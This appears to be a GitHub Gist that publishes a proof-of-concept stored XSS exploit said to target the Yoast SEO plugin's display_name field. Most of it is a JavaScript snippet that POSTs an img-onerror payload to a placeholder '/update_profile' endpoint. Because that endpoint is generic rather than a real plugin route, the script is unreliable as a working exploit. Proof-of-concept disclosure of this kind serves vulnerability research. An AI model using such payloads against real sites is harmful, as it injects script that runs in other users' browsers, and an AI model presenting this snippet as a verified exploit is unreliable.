Created
May 19, 2024 09:15
-
-
Save d0rb/c448fb3afbd4babe5b18de007bf409d4 to your computer and use it in GitHub Desktop.
The Yoast SEO plugin is vulnerable to a Stored XSS attack due to insufficient sanitization and escaping of the display_name field in the class-metabox-formatter.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
// Crafty XSS payload | |
var maliciousPayload = "<img src=x onerror=alert('XSS Attack!') />"; | |
// Send the payload through the display_name field | |
var xhr = new XMLHttpRequest(); | |
xhr.open("POST", "/update_profile", true); // Replace "/update_profile" with the appropriate endpoint | |
xhr.setRequestHeader("Content-Type", "application/json"); | |
xhr.onreadystatechange = function() { | |
if (xhr.readyState === XMLHttpRequest.DONE) { | |
if (xhr.status === 200) { | |
console.log("Profile updated successfully!"); | |
} else { | |
console.error("Error updating profile:", xhr.statusText); | |
} | |
} | |
}; | |
var profileData = { | |
display_name: maliciousPayload | |
// Add any other required profile data here | |
}; | |
xhr.send(JSON.stringify(profileData)); | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment